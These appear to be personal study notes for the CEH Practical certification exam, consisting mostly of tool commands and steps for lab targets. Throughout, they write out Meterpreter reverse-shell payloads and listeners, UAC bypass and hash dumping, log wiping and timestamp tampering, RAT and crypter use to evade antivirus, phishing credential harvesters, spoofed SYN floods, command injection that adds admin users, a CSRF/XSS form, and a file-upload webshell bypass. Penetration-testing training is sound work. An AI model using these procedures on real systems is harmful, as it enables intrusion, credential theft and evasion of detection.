CEH_Practicl
CEH Practical (MASTER) Notes
By Chinmaya Ramana (CEH CHFI CCIO)
October 1, 2022
Ethical Security Experts
Contents
Scanning Networks 4
Enumeration 6
Vulnerability analysis 10
System hacking 10
Steganography 14
SQL Injection 15
Hacking Web Applications & Servers 15
Cloud Computing : 17
Cryptography: 17
Scanning: 21
Enumeration 23
Vulnerability Assessments 26
System hacking 27
Malware Threats 33
Sniffing 35
Social Engineering 37
Denial of Service 38
Session Hijacking 39
Evading IDS Firewalls and Honeypots 40
Hacking Webservers 41
Hacking Web applications 42
SQL Injection 47
Hacking Wireless Networks 48
Hacking Mobile Applications 51
IOT and OT Hacking 52
Linux based tools 55
-------------Tools, Commands and Techniques for CEH Master--------------- 56
1) Nmap 56
2) wpscan 57
3) sqlmap 58
4) Hashcat and john 59
5) Netuser 61
6) Hydra 61
7) Phonesploit 62
8) 62
9) Enumeration 62
10) Steganography 63
11) Wireshark DDOS and Passwords 63
12) Easy - Command Injection 63
13) Medium - Command Injection 63
14) High - Command Injection 64
15) FILE UPLOAD – WINDOWS 64
16) Steghide 64
17) Banner-grabbing 64
cURL 65
Wget 65
Telnet 65
Netcat 65
Nikto 65
Nmap 65
Dmitry 66
18) Directory Busting 66
18) CEWL 67
Exam Cheats sheets (1): 67
NMAP 67
CEWL 67
FUZZING 67
HASHCAT 67
Hydra 68
Johntheripper 69
Netdiscover 69
Responder 69
Searchsploit 71
SQLmap 71
TCPdump 72
Wireshark 72
Wpscan 73
Exam Cheats sheets (2): 73
Exam Cheats sheets (3): 77
Exam Cheats sheets (3): 79
Exam Cheats sheets (4): 82
Exam Questions: 92
TryHackMe Rooms 94
Scanning Networks
Note:
MegaPing
MegaPing is the ultimate must-have toolkit that provides all essential utilities for Information System specialists, system administrators, IT solution providers or individuals.
Mega Ping is also a port and service scanning tool which is for Windows.
Hping3
hping3 is a network tool able to send custom ICMP/UDP/TCP packets and to display target replies like ping does with ICMP replies.
It handles fragmentation and arbitrary packet body and size, and can be used to transfer files under supported protocols. Using hping3, you can test firewall rules, perform (spoofed) port scanning, test network performance using different protocols, do path MTU discovery, perform traceroute-like actions under different protocols, fingerprint remote operating systems, audit TCP/IP stacks, etc. hping3 is scriptable using the Tcl language.
Hping3 is a python based tool used to scan and flood(DOS) the particular IP.
Enumeration
Tool: https://nbtenum.sourceforge.net/
Microsoft Documentation: https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/nbtstat
Tool : https://www.kali.org/tools/snmpcheck/
Vulnerability analysis
Tools:
OpenVAS
Nessus
GFI LanGuard
Nikto
System hacking
Gem References: https://github.com/SpiderLabs/Responder
https://medium.com/mii-cybersec/gaining-credentials-easily-with-responder-tool-b821f33e342b
Command used: msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=YOUR-IP-ADDRESS LPORT=ANY-FREE-PORT -o /root/Desktop/virus.exe
Blog: https://www.yeahhub.com/exploit-windows-malicious-ms-office-file-metasploit-framework/
https://medium.com/@tommelo/bypassing-windows-10-uac-with-python-aed3c835c4f0
Steganography
Gem: https://www.openstego.com/
SQL Injection
Tool: https://github.com/stamparm/DSSS
Hacking Web Applications & Servers
$ medusa -h 10.10.10.x -U /root/Documents/user_list.txt -p /root/Documents/pass_list.txt -M ftp -F
Reference: https://www.youtube.com/playlist?list=PLHUKi1UlEgOJLPSFZaFKMoexpM6qhOb4Q
Cloud Computing :
Cryptography:
Scanning:
nmap -sn -PR 192.168.1.1
acquire nmap cheatsheet
hping 3 -A 192.168.1.1 -p 80 -c 5
-A SCK Flag
-p port
-c pkt count
no respnse -filtered
response - closed
hping3 -8 0-100 -S 192.168.1.10 -V
-8 scan mode or --scan
0-100 port range
-V versbose
-S SYN FLAG
hping3 --scan 0-100 -S 192.168.1.10 -V
os/banner grabbing using 1-TTL.png
method
ping ip
open wireshark and chekc time to live FLAG value in IPV4 SECTION
os/banner grabbing using NMAP NSE
nmap -A 192.168.1.2
nmap --script smb-os-discovery.nse 192.168.1.1
os discovery using unicorn scan
unicornscan $ip -Iv
-I immediate mode
-v verbose mode
result would be TTL values compare with TTL chart
scan beyond IDS and firewall
nmap -f $ip
-f fragment pkts
most ids skip reassembly and makes pkts pass
nmap -g 80 $ip
-g , --source-port change actual source port with common ones
nmap -mtu 8 $ip
-mtu maximum transmission unit, smaller pkts transmission
nmap -D RND:10 $ip
-d performs a decoy scan
RND generates random and non reserved IP addresses
create custom pkts using colasoft pkt builder to scan beyond IDS/firewall
create custom udp / tcp pkts using hping3 to scan beyond IDS/firewall
hping3 $ip --udp --rand-source --data 500
--udp udp pkts
--rand-source random source mode
--data pkt body size
create custom udp / tcp pkts using nmap to scan beyond IDS/firewall
nmap $ip --data 0xdeadbeef
--data hex string to send binary data
nmap $ip --data-string "i am http://youtube/c/mastersprak"
--data-string string data
nmap $ip --data-length 5
--data-length append random bytes to pkts
nmap $ip --randomize-hosts
--randomize-hosts scan in random order
nmap $ip --badsum
--badsum send bogus tcp/udp checksum to avoid detection
draw network diagram using network topology mapper
the scan result will give you hw/sw details of detected computers in networks
perform network scanning using various network scanning tools
using NMAP
nmap $ip/24 -sS -A -Ox Test
-sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
-A: Enable OS detection, version detection, script scanning, and traceroute
-oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3
using metasploit
Method 1
import nmap text.xml into msf
db_import Test
hosts
list of ips discovered, with os name, service pack, mac addr
services
list of ips, open ports, protocol,service name,state,info
Method 2
Phase1- Network Discovery
search portscan
use auxiliary/scanner/portscan/syn
set INTERFACE eth0
set PORTS 80
set RHOSTS 192.168.1.10-30
set THREADS 50
run
Phase2- OS Discovery
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.10-30
set THREADS 50
run
Phase3- Service Discovery (e.g ftp port 21 is open)
use auxiliary/scanner/ftp/ftp_version
set RHOST 192.168.1.10
run
Phase4- save results in file
hosts -o scanresults.csv
Enumeration
Enumeration
Extraction of username,machine names,network resources, shares and services from a system or network,
audit & service settings, snmp & fqdn,
perform netbios enumeration
-extract list of computers in domain,network shares, and policies.
netbios name 16ch ascii string, used as device name
allow attacker to read/write to remote system
*NB enum using cmd
nbtstat -a $ip
a nb name of remote comp
nbtstat -c $ip
c nb name cache of remote comp
net use
connection status, shared folder, network info
connect or disconnects a computer from shared resource
*nb enum using netbios enumerator
*nb enum using nmap nse
nmap -sV -v --script nbstat.nse $ip
-sV: Probe open ports to determine service/version info
*perform smnp enum
extract info about network resource- hosts,routers,devices,shares, routing table, device info,traffic stat
**perform smnp enum using snmp-check
check if snmp is open
nmap -sU -p 161 $ip
-depicts : 161 is being used by the default public ocmmunity string
snmp-check $ip
//get info about sys info and user accounts,network info , network interfaces,routing info,and listening ports
//process, storage ,file system ,device info,shares ,file system
**perform smnp enum using soft perfect network scanning
specify range ,discover devices,rightclick properties and get details
*perform LDAP enumeration
..generate list of distributed directory services on target system
..directory services has hierarchical and logical tree about components of network, from list of printers to corporate email directories
.. company org chart
**perform LDAP enumeration using Active Directory Explorer by sysinternals
connect using IP and creds
complete AD would be displayed and possible to modify also
*perform NFS Enumeration
NFS - access / view /store /update files on reomote server
After LDAP go for NFS - IDENTIFY EXPORTED DIRECTORIES,list of clients connected to server with their ip addr and shared data associated with them
Possible to spoof ip and get acces to shared resource
**perform NFS Enumeration superenum
check if nfs is open
nmap -p 2049 $ip
nfs also runs on other ports
echo $ip > target.txt
./superenum
//pass filename -> target.txt
15-20 minutes to complete
**perform NFS Enumeration rpc-scan
git clone https://github.com/hegusung/RPCScan
python3 rpc-scan $ip --rpc
it will show the list if nfs is open
*perform dns enum
//collect dns server name,hostnames,machine names,usernames,ip addrr and aliases in target domain
**perform dns enum using zone transfer
open termninal in linux
dig ns www.certifiedhacker.com
reterive info about dns name server pf target domain and displays in answer section
try if zone transfer is possible
dig @ns1.bluehost.com www.certifiedhacker.com axfr
axfr reterive zone information
**perform dns enum of windows DNS servers.
open cmd in windows
>nslookup
>set qyerytype=soa
soa start of authority record, administrative info about dns zone
>certifiedhacker.com
>ls -d ns1.bluehost.com
ls -d requests zone transfer
ns1.bluehost.com primary name server
**perform dns enum usign DNSSEC zone walking
//dns records(MX,SOA,NS,A,AAAA,SPF,TXT) enumerator
dnsrecon -d www.certifiedhacker.com -z
-d domain
-z zone walk using standard enum procedure
*perform rpc, smb, and ftp enumeration
rpc-> check vulnerable services on these ports
smb-> enable banner grabbing, os detais,service version
ftp-> check ftp services and attack, ftp bounce, ftp brutre and packet sniffing
*perform rpc & smb enumeration using netscan tools pro
RPC- netscan tools pro
>MANUAL TOOLS
>nix RPC info
>target ip, target port 111
>dump portmap
>result: reterival of all running registred daemons on target system
SMB- - netscan tools pro
>smb scanner
>add to list ->ok
>login cred, username, password > add to list > ok
>click get smb versions
>result: netbios name,dns name,smb versions,shares
*perform rpc & smb & ftp enumeration using nmap
nmap -p 21 $ip
nmap -A $ip
nmap -A -p 445 $ip
*perform enumeration using various enum tools
*global network inventory
>new audit wizard
>single address scan
>name-> IP
>connect as -> credentials
*enumerate resources using Advanced IP Scanner
*enumerate info from windows and samba hosts using enum4linux
enum4linux -u martin -p apple -n $ip
-n Do an nmblookup (similar to nbtstat)
//information: target info,workgroup/domain,domain SID(SECURITY IDENTIFIER), list of users with RID(RELATive identifier)
enum4linux -u martin -p apple -P $ip
//password policy info
enum4linux -u martin -p apple -S $ip
//share policy info
Vulnerability Assessments
vulernability scoring system
cwe - common weekness enumeration
cve - common vulnerabilities and exposure
nvd - national vulnerability database
cvss- common vulernability scoring system
*Perform vulnerability research in common weekness enumeration
https://cwe.mitre.org
> search cwe > smb > links would be shown
*Perform vulnerability research in common vulnerabilities and exposure
https://cve.mitre.org
search > cve-2017-5638
*Perform vulnerability research in national vulnerability database
base score: inherent quality of vuln
temporal score: quality of vuln that change over time
>search vulnerabilty database
>keyword search > smb
*perform vulnerability assesment using various vulnerability assessment tools
*OpenVas
>scan> tasks>
*Nessus
>advanced scan >ip
*GFI Lan Guard
>launch a scan
perform web server and app vulnerability scanning using CGI Scanner Nikto
nikto -h www.certifiedhacker.com -tunning x
-h target host
-x reverse tunning (include all except specified)
-tunning -increase /decrease test performed against target
nikto -h www.certifiedhacker.com -Cgidirs all
nikto -h www.certifiedhacker.com -o Nikto -f txt
System hacking
Perform active online attack to crack system password using responder
*LLMNR, NBT-NS -> Perform name resolution for host
cd Responder
chmod +x Responder.py
sudo ./Responder.py -I ens33
-I interface
ens33 interface name
server will start running and waiting for some connection in network
if hash captured visit same location as of responder
filename-> SMB-NTLMv2-SSP-10.10.10.10.txt
rename to hash.txt
open johnripper to crack hash collected
sudo john hash.txt
it will use default wordlist
____________________________________________________________________________________
*Audit password using lopht crack
pw audit wizard
> windows
>remote mahcine
>credentials
>Thorough pw audit
____________________________________________________________________________________
*find vuln on exploit sites
>>exploitdb.com
>search edb
>set type, platform, title e.t.c
>download
>>securityfocus.com
>search and download exploit from here
____________________________________________________________________________________
*exploit client side vuln & establish a VNC session
msfvenom -p windows/meterpreter/revese_tcp --platform windows -a x86 -f exe LHOST 10.10.10.13 LPORT 4444 -o /root/Desktop/Test.exe
**make user to run above exe
**on attack side
msfconsole -q
use exploit/multi/handler
set LHOST 10.10.10.13
set LPORT 4444
exploit
once exploited , meterpreter would be received
*Esclate previlages
git clone https://github.cmo/PowerShellMafia/PowerSploit
Run following commands from meterpreter
upload /root/PowerSploit/Privesc/PowerUp.ps1 PowerUp.ps1
shell
powershell -ExecutionPolicy Bypass -Command "..\PowerUp.ps1;Invoke-AllChecks"
give you details about system services,registry autoruns,unattended installs e.t.c
run vnc
____________________________________________________________________________________
* Gain Access to remote system using Armitage
connect > host,port,user,pass
hosts>nmap scan>intense scan>give ip
step 1
from left pane select windows/meterpreter/meterpreter_reverse_tcp
set LHOST,LPORT ,OUTPUT TYPE = EXE
copy to client
step 2
from left pane select windows/meterpreter/meterpreter_reverse_tcp
set LHOST,LPORT ,OUTPUT TYPE = multi/handler
launch on attacker
execute exe created in step 1 on client, system will be pwned & meterpreter will be received at attacker
____________________________________________________________________________________
*Hack a windows machine with malicious office doc using the fat rat
step1
git clone https://github.com/Screetsec/TheFatRat
cd TheFatRat
chomd +x fatrat
chomd +x setup.sh
chomd +x powerfull.sh
./setup.sh
select install searchsploit from kali repo
fatrat
create fud backdoor 1000% with pwnwinds [Excellent]
create exe file with apache + powershell
set LHOST,LPORT , filename (payload)
choose payload -> windows/meterpreter/reverse_tcp
backdoor created
step2
fatrat
7-create backdoor for office with microsploit
2-the microsoft office macro on windows
set LHOST, LPORT, filename (BadDoc)
Enter mssage body= you have been hacked
are you want to use custom backdoor? >yes
payload.exe (backdoor created in first step)
step3
**on attack side
msfconsole -q
use exploit/multi/handler
set LHOST 10.10.10.13
set LPORT 4444
exploit
once exploited , meterpreter would be received
____________________________________________________________________________________
********** Buffer overflow missing
____________________________________________________________________________________
*perform priv esclation
let's start after attainning meterpreter shell
exploit session as background
exploit -j -z
bring to front
sessions -i 1
*using Beroot
*use Beroot to run a config assement test on target to find vuln, services other data etc
meterpreter> upload beRoot.exe
shell
beRoot.exe
*** try to esclate priv
method 1
run post/windows/gather/smart_hashdump
error:insufficent previlages
method 2
getsystem -t 1
error:access denied
bypass windows UAC protection via fodhelper
meterpreter>background
use exploit/window/local/bypassuac_fodhelper
show options
set SESSION 1
set LHOST $IP
set LPORT 444
set TARGET 0 (for windows)
exploit
*check privilages again
getuid
output:windows10\admin
get system -t 1
output:got sytem via technique 1
getuid
output: NT Authority\System
check again
run post/windows/gather/smart_hashdump
output:hashes would be displayed
____________________________________________________________________________________
* MACE, Modeified,Access,Created,Entry Modified
MACE change qucikly on access to reset them on will TimeStomp command is used
>timestomp secret.txt -m "02/11/22 08:10:03"
to view updation
>timestomp secret.txt -v
similarly -a, -c, -e is used for others
____________________________________________________________________________________
* maintain remote access and hide malicious activity
1- user system monitoring and surviellence using powerspy
2- user system monitoring and surviellence using spytech spyagent
Hide Files using NTFS Streams
NTFS
>Store data using 2 file systems
stream 1 -security descripters such as permissisons
strean 2 -actual data
Procedure
copy calc.exe to c:\magic
create readme.txt and write hello word in it
type c:\magic\calc.exe > c:\magic\readme.txt:calc.exe
now delete calc.exe
mklink backdoor.exe readme.txt:calc.exe
backdoor.exe
calc would be opened,backdoor is just name of link it will open calc.exe in readme file
____________________________________________________________________________________
Hide data using white space steganography
Stego
hello world > original.txt
snow -C -m "ACCOUNT NUMBER 123" -p "magic" original.txt stegoed.txt
-p password
-m message
-C compression
Unstego
snow -C -p "magic" stegoed.txt
output: ACCOUNT NUMBER 123
____________________________________________________________________________________
Image stego using open stego
messagefile, coverfile, password, encryption, output file
____________________________________________________________________________________
*Covert Channel using Covert_TCP
parrot
(compile covert_tcp.c)
cc -o cover_tcp covert_tcp.c
a warnning would be generated
ubuntu
tab1:
sudo su
tcpdump -nvvx port 8888 -i lo
tab2:
(compile covert_tcp.c)
cc -o cover_tcp covert_tcp.c
a warnning would be generated
start a listener
./covert_tcp -dest 10.10.10.9 -source 10.10.10.13 -source_port 9999 -dest port 8888 -server -file receive.txt
output: lsitening for data from 10.10.10.13, and port 9999
parrot
./covert_tcp -dest 10.10.10.9 -source 10.10.10.13 -source_port 8888 -dest port 9999 -server -file secret.txt
data transmission started
____________________________________________________________________________________
*Clear logs to hide evidence
disable auditing, clear log, manipulate logs, cover track on network/os, delete files, disable win unctinlaity
____________________________________________________________________________________
view enable or clear audit policies using auditpol
auditpol /get /category:*
output: displays system audit policy
*** enable audit policies
auditpol /set /category:"system","account logon" /success:enable /failure:enable
*** clear audit pol
auditpol /clear /y
____________________________________________________________________________________
*clear windows machine logs using various utilities
method 1
systemhacking \covering tracks\clear_event_viewer_logs.bat > run as admin
method 2
cmd> wevtutil el
shows all logs
wevutil cl system
system is log name others can b application, security
method 3
cmd> cipher /w:C:
overwrite deletd files with zeroes and then 2555s
securely deletes a chunk of data
____________________________________________________________________________________
clear linux machine logs using the bash shell
export HISTSIZE=0
number of commands to be saved
history -c
-c rewrite or review earlier command , alternate to disable history
-w delete history
shre ~/.bash_history
shred history file
(clear windows machine logs using c cleaner
Malware Threats
*Gain control over victim machine using njRAT RAT trojan
open njrat > builder > host,port,name,copyto startup, copy to regiustry > build
execute exe at client side and receive connection
_____________________________________________________________________________
*Hide Trojan using swayzCrypter and make it undetectable using various antivirus programs
import exe >check startup,mutex,disable uac > encrypt
check on virus total
_____________________________________________________________________________
*Create server using ProRAT tOOL
CLICK create>create prorat server (342kbayt)
set server port, password,victim name
click bind with file > bind server with file
import any jpg
click server extension > exe
generate exe
execute at client side
connect using ip,port at server side
_____________________________________________________________________________
* Create a Trojan using Theef RAT Trojan
_____________________________________________________________________________
2 files
server210.exe --- vitim
client210.exe --- attacker
virus >
self repilcating program,
attach copies of itself to other exe's , based on specific events
operates without knowledge/desire of user
worm > like a virus, does requrie a worm to replicate
____________________________________________________________________________
* Create a Virus using JPS Virus Maker tool
Too many options, set as much require , e.g. change windows password
check convert to worm
click create virus
execute on server side
_____________________________________________________________________________
* Perform static malware anlayis
1- Check on Virus total
2- Perform string search using BinText
extract string out of exe
3- Identify Packaging & obfuscation methods using PEid
it may give you warnning after detecting virus
4- Find PE info of a Malware executable file
5- Perform malware disassembly using IDA and OllyDbg
Graphs > flowcharts
View > Executable Modules
_____________________________________________________________________________
* Perform dynamic malware anlayis
To run in monitored form
system baselining > capture snapshot before execution of sucpicous file
Host integrity monitoring > to study the change taken place after execution of sucpicious file
*** Using TCP view and Curr Ports - Sysinternals
1- execute and make a connection using njRat trojan tool
2- open tcp view to mointor connections on system
right-click>properties
*** Using Process Monitor
Run > select process > properties > process > path and details
*** Using Reg Shot
1- 1st shot and save
2- install desired software
3- second shot and save
4- compare
*** Using JV16 Powertools
perform intensive scan for unwanted resource using jv16 powertools
clean and speedup my pc
*** Windows services montioring using windows service manager (srvman)
select and check properties of running services
*** Perform startup program monitoring using Autoruns and Win Patrol
Autoruns >explorer> shows list of startup programs
same way winpatrol works
*** Installation monitoring using Mirekusoft Install Monitor
programs > view installed programs
cleanup using win patrol will remove all remenants of uninstalled programs
*** Files and Folders monitoring using PA File Sight
*** Device Driver monitoring using DriverView and Driver Booster
driver monitoring > properties
driver booster > missing/outdated drivers
*** Perform DNS monitoring using dnsquerysniffer
>select interface
>gui would display any incoming dns query
Sniffing
* MAC flooding using macof
Force switch to act as hub
macof -i eth0 -n 10
-i interface
-n count
_______________________________________________________________________________________
*DHCP Stravation using Yersinia
> yersinia -I
>gui
> h for help
>f2 > DHCP Mode
> press 1 to send discover packet
_______________________________________________________________________________________
*ARP Poisoning using arpspoof
arpspoof -i eth0 -t target-ip-to-arp-spoof accesspoint-ip
-t specifies host to arp poison
informing the target ip that i am the access point
check windows cmd for arp table modification on victim
arp -a
_______________________________________________________________________________________
* MITM using Cain & Abel
obtain passwords using cain and abel
system 1:
>configure > sniffer > ensure the correct adapter is selected
>main menu > plus icon > mac addr scanner > all hosts in my subnet >acquire list
>click arp button at bottom
>click + icon > new arp poison routing
> select sender and receiver of traffic you want to monitor
> start/stop arp posioning
System 2:
ftp 10.10.10.10
provide login creds
system 1:
> Displays the traffic in ftp section
> see username and password here
_______________________________________________________________________________________
*Spoof mac using TMAC & SMAC
TMAC
> select interface > random mac > change now
SMAC
> select interface > click random > update
_______________________________________________________________________________________
*Perform network sniffing using variou tools
***WireShark password sniffing
******LOGIN PASSWORD CAPTURE OF HTTP
>monitor interface using wireshark
>open http://moviescope.com in browser and login
> filter wireshark traffic
http.request.method == POST
>Top menu > find packets
write search string pwd
> click find and packet would be displayed
****** REMOTE RDP PACKET CAPTURE
>RDP to remote host
>services > remote packet capture protocol (experimental) > start
>close remote desktop
> open wireshark
>interface icon> manage interfaces>remote interface> add ip,passwords of remote system
> packets of remote system activity can be seen on your wireshark
*Analyze a Network using Capsa Network Analyzer
> install > full analysis
> various categories would be auto created based on data, protocol, statistics
*Analyze a Network using Omni Peek network Analyzer
>Segments various info about network in nice categories
*Analyze a Network using Steel Central Packet Analyzer
>select interface from left
>login to some website
>check various categories
_______________________________________________________________________________________
*Detect ARP poisioning in switch based network
*** WireShark
> wireshark >preferences>protocols>ARP
>check "Detect ARP request storms"
or
> Analyze > Expert information
>IP address duplication
ARP Posion the network using cain & abel and detect using above 2 methods
*** XARP
install only and notify in case of arp poisoning
*** Detect promiscous mode using nmap
nmap --script sniffer-detect $ip
*** NetScan Tool Pro
Manual tools> promiscous mode scanner
>ip range > do scan
_______________________________________________________________________________________
Social Engineering
Sniff user cred using SET
>SET
>SOCIAL engineering attacks
>website attack vector
>credential harvestor attack method
>site cloner
>ip where cred should be posted back
>link of website to clone
>send email with this link
>once user enter creds , they would be posted back on provided ip
________________________________________________________________________________________
*Perform phishing using ShellPhish
>chmod +x ./shellphish.sh
>./shellphish
>select website to clone
>select Ngrok as port forwarding option
>a link would be generated
> https://a6375de.ngrok.io
>share link
> creds would be posted back on your terminal
________________________________________________________________________________________
*Detect phishing Attack
*** Net Craft
netcraft extension for chrome
autoblock phishing
*** Phish Tank
> enter url of susected site in search
> check reputation
________________________________________________________________________________________
Audit org. sec. aganst phishing using ohphish
>entice to click > create email > send to company's employees
> auto report generated
Denial of Service
*Perform a DOS attack (syn flooding) using metasploit
use auxiliary/dos/tcp/synflood
set RHOST
set RPORT
exploit
it would generate flood on target
________________________________________________________________________________
Perform DOS USING Hping3
hping3 -S $target-ip -a $spoofed-ip -p 22 --flood
-S set SYN flag
-a spoof self ip
-p dest port
open wireshark > statistics > I.O graph
***to send large high volume data
hping3 -d 65538 -S $target-ip -a $spoofed-ip -p 22 --flood
***flood udp port of netbios
hping2 -2 -p 139 --flood $ip
-2 udp mode
_______________________________________________________________________________
Perform DOS USING HOIC & LOIC
ENTER TARGET
SET POWER > HIGH
ADD
FIRE THE LAZER
______________________________________________________________________________
Detect / protect against dos attack using anti ddos guardian
Session Hijacking
intercept using burp or zap
can repeat or change request data manually
______________________________________________________________
intercept using bettercap
bettercap -iface eth0
10.10.10.0/24 > 10.10.10.13
net.probe on
net.recon on
set net.sniff.regexp '.*password=.+'
collect all logins on specified network
for ssl based sites
set http.proxy.sslstrip true
______________________________________________________________
Detect session hijacking
ids/ips
wireshark
Evading IDS Firewalls and Honeypots
Configure snort to detect malicous traffic
_________________________________________________________________________________
Detect Malicious N/W traffic using zone alarm free firewall
> app control mode > auto learn
> basic firewall> view zones>add>host/site
> add zone to trust or block
_________________________________________________________________________________
Detect Malicious N/W traffic using HoneyBOT
> install
> check following
# auto start on load
# capture binaries
# rotate logs
# export logs
> capture will be started auto
_________________________________________________________________________________
*Firewall Evasion using various techniques
***NMAP
>BLOCK TRAFFIC OF ATTACKER IN FIREWALL
> nmap $ip
output:all ports are filtered
Let's ping sweep
> nmap -sP $ip
output: ports and live hosts would be displayed
Let's zombie scan
> nmap -sI $ip
output: open pors with service and verison info
*** HTTP/FTP TUNNELING
vicitm
> services > world wide web publishing service
> run HTTHOST ON VICTIM
> ESTABLISH A LISTENER AT PORT 90
> add firewall rule to block traffic to port 21
attacker
> not able to ftp to victim
> install HTTPORT
> ENTER HOST,IP IN PROXY TAB @ BOTH FIELDS
> CLICK PORT MAPPING > ADD > NEW MAPPING RIGHT CLICK > EDIT > ADD PORT 21
> START
> TRY TO FTP AGAIN
> PORT 21 TRAFFIC WOULD BE TUNNLED FROM PORT 90
Hacking Webservers
information gathering using ghost eye
> python3 ghost_eye.py
output : menu with diff info gathering options
> enter 1: whois lookup
> input: ceh.com
output whois info
> test clickjacking by entering 6
________________________________________________________________________________________________
Web server recon using skip fish
skipfish -o skifish-output.txt -S /usr/share/skipfish/dictionaries/complete.wl http://10.10.10.10:8080
________________________________________________________________________________________________
Web server recon using httprecon
> add domain and port
> click analyze
________________________________________________________________________________________________
Web server recon using idserve
-identify web server ,http server, non http server, reverse dns lookup
>enter url
>query the server
________________________________________________________________________________________________
Footprint webserver using netcat and telnet
nc -vv www.moviescopr.com 80
output : http response in terminal , X-Powered by : Asp.net
________________________________________________________________________________________________
Footprint webserver using netcat and telnet
nmap -sV --script=http-enum www.goodshopping.com
nmap --script hostmap-bfk -script-args hostmap-bfk.prefix=hostmap- www.goodshopping.com
To detect VULNERABLE web server by checking if http trace method is enabled
nmap --script http-trace -d www.goodshopping.com
To check web app firewall is configured on target or domain
nmap -p80 --script http-waf-detect www.goodshopping.com
________________________________________________________________________________________________
*uniscan web server fingerprinting
directory enumeraton like ffuf , gobuster or dirbuster
uniscan -u http://10.10.10.10:8080/CEH -q
*** To check robots.txt and sitemap.xml
uniscan -u http://10.10.10.10:8080/CEH -we
*** Enable dynamic testing option
uniscan -u http://10.10.10.10:8080/CEH -d
________________________________________________________________________________________________
*Perform a web server attack
*** Crack FTP Cred using dictionary attack
>hacking web servers> wordlists
check if ftp is open
nmap -p21 $ip
check if anonymous login is allowd
login failed ?
hydra -L wordlists/usernames.txt -P wordlists/Passwords.txt ftp://$ip
output: displays login creds
Hacking Web applications
*Perform web app recon
netcraft, smartwhois, whoislookup, batchipconverter
** check if http is running with NMAP
nmap -T4 -A -v www.moviescope.com
** use telnet for banner grabbing
telnet www.moviescope.com
__________________________________________________________________________________________
*Perform web app recon using whatweb
whatweb -v url
whatweb --log-verbose=moviescope Report url
__________________________________________________________________________________________
perform web spidering using owasp zap
-Help discover hidden content
> zaproxy >url to attack >attack
__________________________________________________________________________________________
Detect Load balancers
>dig yahoo.com
output: multiple ips in answer section means load balancers are there
>lbd yahoo.com
output:
check for dns load balancers
check using received applciation data
__________________________________________________________________________________________
Identify web server directories
*** NMAP
nmap -sV --script=http-enum www.movie.com
*** Gobuster
gobuster dir -u http://ww.movie.com -w common.txt
__________________________________________________________________________________________
Perform web app vulnerbility scanning using vega
>enter url > seect modules > check injection,response processing modules
>run
__________________________________________________________________________________________
identify click jacking using iframe
create following file iframe.html
<html>
<head>
<title>Click jacking vuln test</title>
</head>
<body>
<p>site is vulnerable to click jacking</>
<ifram src="http://ww.movie.com" width="800" height="600"></iframe
</body>
<html>
__________________________________________________________________________________________
Brute force attack using burpsuite
enter login creds > intercept in burp
pass to intruder
goto intruder > clear all positions
selct username and password to be as variable
attack type > cluster bomb
start attack > filter by length
__________________________________________________________________________________________
Parameter tampering using burpsuite
manipulation of parameters exchanged in web request
login > view profile > intercept in burp > change profile id from 1 to 2
profile of user 2 would be displayed
__________________________________________________________________________________________
Exploit paramter tampering and XSS vulnerability in XSS Application
paramter tampering
change profile id param in get request in url and profile of second user will be displayed
XSS vulnerability
occurs in dynamically generated web pages
<script>alert('hello world')</script>
__________________________________________________________________________________________
CSRF cross site request forgery attack
to send a request to vulnerablite site from malicious site
case study
leenk.me 2.5.0 is installed as wp plugin and enabled
open http://wpvulndb and generate API token (free: 50 api requests)
open wpscan
wpscan --api-token token-here --url http://10.10.10.10:8080/CEH --plugins-detection aggressive --enumerate vp
--enumerate vp specifies enumeration of vulnerable plugins
output: leenk.me 2.5.0 is vulnerable to xss and csrf
create a security-script.html
<html>
<body onload="document.forms['CSRF'].submit()">
<form name="CSRF" action="http://10.10.10.16:8080/CEH/wp-admin/admin.php?page=leemkme_facebook" method="POST">
<input type="hidden" name="facebook_profile" value="on" />
<input type="hidden" name="fb_publish_wpnonce" value="" />
<input type="hidden" name="wp_http_referer" value="CSRF" />
<input type="hidden" name="facebook_message" value="" />
<input type="hidden" name="facebook_linkname" value="" />
<input type="hidden" name="facebook_caption" value="" />
<input type="hidden" name="facebook_description" value="</textarea>;<script>prompt();</script>" />
<input type="hidden" name="default_image" value="CSRF" />
<input type="hidden" name="message_preference" value="author" />
<input type="hidden" name="clude" value="in" />
<input type="hidden" name="publish_cats[];" value="0" />
<input type="hidden" name="update_facebook_settings" value="save settings" />
<input type="submit" value="submit form"/>
</form>
<body>
</html>
execute above script to check if CSRF is possible
__________________________________________________________________________________________
Enumerate & Hack a web app using WPScan and Metasploit
wpscan --api-token token-here --url http://10.10.10.10:8080/CEH --enumerate u
--enumerate u enumerate users
acquire list of users
msfconsole -q
use scanner/http/wordpress_login_enum
set PASS_FILE /home/attacker/desktop/wordlist
set RHOSTS 10.10.10.10
set RPORT 8080
set TARGETURI http://10.10.10.10:8080/CEH
set USERNAME admin
run
__________________________________________________________________________________________
Exploit RCE to compromise a target web server
DVWA > PING A DEVICE
| whoami
output: nt authority/system
| tasklist
output: procesees
| net user Test /Add
create user named as test
| net user
list all users
| net user Test
check access rights of Test , local group membership
| net localgroup Administrators Test /Add
Add Test user to admin group
__________________________________________________________________________________________
Exploit file upload vulnerability at different security levels
msfvenom -p php php/meterpreter/reverse_tcp LHOST=10.10.10.13 LPORT=4444 -f raw
output : raw shell data on terminal
copy data from terminal and paste in file upload.php
dvwa > security level > low
upload file to site
output: uploaded
listener for shell
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 10.10.10.13
set LPORT 4444
run
listener started
execute file from ../../hackable/uploads/upload.php
meterpreter acquired
dvwa > security level > medium
upload file to site
output: only jpg allowed
change name from upload.php to upload.php.jpg
upload file to site > intercept from burp change upload.php.jpg to upload.php again
output: uploaded
listener for shell : same as above
dvwa > security level > high
open upload.php
Add following data to 1st line
GIF98
change name from upload.php to high.jpeg
upload file to site
output: uploaded
from command injection change file name from high.jpeg to shell.php
execute file from ../../hackable/uploads/shell.php
listener for shell : same as above
__________________________________________________________________________________________
Gain Backdoor access via a webshell using weevely
weevely generate toor shell.php
toor > password
weevely http://10.10.10.10:8080/CEH/dvwa/hackable/uploads/shell.php toor
output waiting for connection
execute listener on other side
connection received
__________________________________________________________________________________________
Detect web app vuln using vuln scanner
